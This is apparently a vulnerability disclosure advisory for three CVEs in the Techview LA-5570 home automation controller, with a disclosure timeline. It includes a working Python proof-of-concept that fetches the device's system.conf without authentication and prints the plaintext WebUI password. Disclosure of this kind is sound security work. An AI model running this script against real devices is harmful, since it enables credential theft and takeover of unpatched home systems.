Multiple Vulnerabilities found in Techview LA-5570 Wireless Gateway Home Automation Controller
Introduction
The Security Team at [exploitsecurity.io] uncovered multiple vulnerabilities in the Techview LA-5570 Wireless Home Automation Controller [Firmware Version 1.0.19_T53]. These vulnerabilities can be used to to gain full control of the affected device.
CVE-2023-34723
Vulnerability Type: Directory Indexing, allows a threat actor to list the contents of specific directories outside of the web root context.
CVE-2023-34724
Vulnerability Type: On-Chip Debug and Test Interface With Improper Access Control, allows a threat actor unrestricted access to the root filesystem using an exposed UART interface, without the need for authentication.
CVE-2023-34725
Vulnerability Type: Incorrect Access Control, allows a threat actor access to sensitive systems configuration files without proper authentication or authorisation.
Affected Product Overview
The Techview LA-5570 Wireless Home Automation Controller provides a fully wireless solution that enables a home user to secure, monitor and control home facilities locally or remotely via phone, tablet PC, laptop, keypad and keyfob.
Product: LA-5570 Wireless Home Automation Controller
Affected Firmware Version: 1.0.19_T53
Product Vendor Link: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570
CVE-2023-34723
The Security Team at [exploitsecurity.io] discovered that the Techview LA-5570 was susceptible to directory indexing.
This attack allows a threat actor to list the contents of specific directories outside the web root context {/server/cgi-bin/]. Most specifically it was possible to list the contents of the /config/ and /var/tmp/ directories which were found to contain sensitive system files. It was discovered that both of these directories were configured as symbolic links within the web root context [/server/cgi-bin/], whose corresponding directory paths, owned by the root user, were accessible to the web user.
CVE-2023-34724
The Security Team found that it was possible to gain unrestricted access to the root filesystem using an exposed UART interface, without the need for authentication.
CVE-2023-34725
The Security Team found that it was possible to access sensitive files based on improper access control. It was found that it was possible to gain access to the sensitive /config/system.conf configuration file without proper authorisation, which contained the plaintext WebUI login credentials.
Responsible Disclosure
The Security Team at [exploitsecurity.io], reached out to the vendor to ensure that a patch was released prior to public disclosure. However, as of the time of this disclosure, no patch has been applied.
Proof of Concept
The proof of concept code capitalises on CVE-2023-34725 to extract the WebUI password from the affected device, without proper authentication or authorisation.
#!/opt/homebrew/bin/python3
import requests
import sys
from time import sleep
from urllib3.exceptions import InsecureRequestWarning
from colorama import init
from colorama import Fore, Back, Style
import re
import os
import ipaddress
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def banner():
if os.name == 'posix':
clr_cmd = ('clear')
elif os.name == 'nt':
clr_cmd = ('cls')
os.system(clr_cmd)
print ("[+]****************************************************[+]")
print (" | Author : The Security Team |")
print (" | Company : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")
print (" | Description : TechVIEW LA-5570 Directory Traversal |")
print (" | Usage : "+sys.argv[0]+" <target> |")
print ("[+]****************************************************[+]")
def usage():
print (f"Usage: {sys.argv[0]} <target>")
def main(target):
domain = "http://"+target+"/config/system.conf"
try:
url = domain.strip()
r = requests.get(url, verify=False, timeout=3)
print ("[+] Retrieving credentials", flush=True, end='')
sleep(1)
print(" .", flush=True, end='')
sleep(1)
print(" .", flush=True, end='')
sleep(1)
print(" .", flush=True, end='')
if ("system_password" in r.text):
data = (r.text.split("\n"))
print (f"\n{data[1]}")
else:
print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)
except TimeoutError:
print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
except KeyboardInterrupt:
return
except requests.exceptions.Timeout:
print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
return
if __name__ == '__main__':
if len(sys.argv)>1:
banner()
target = sys.argv[1]
try:
validate = ipaddress.ip_address(target)
if (validate):
main (target)
except ValueError as e:
print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL)
else:
print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)
Timeline
26/5 - Raised a support ticket
29/5 - Response from support requesting further information
29/5 - Responded to support detailing that findings had been made, 29/5 - CVE request for placeholder from MITRE
30/5 - Followup email requesting update
1/6 - Followup email requesting update
2/6 - Response from support requesting findings overview
2/6 - Responded to support with findings overview
2/6 - Support escalated to advanced product team
23/6 - Placeholder(s) CVE assigned by Mitre
25/8 - Public disclosure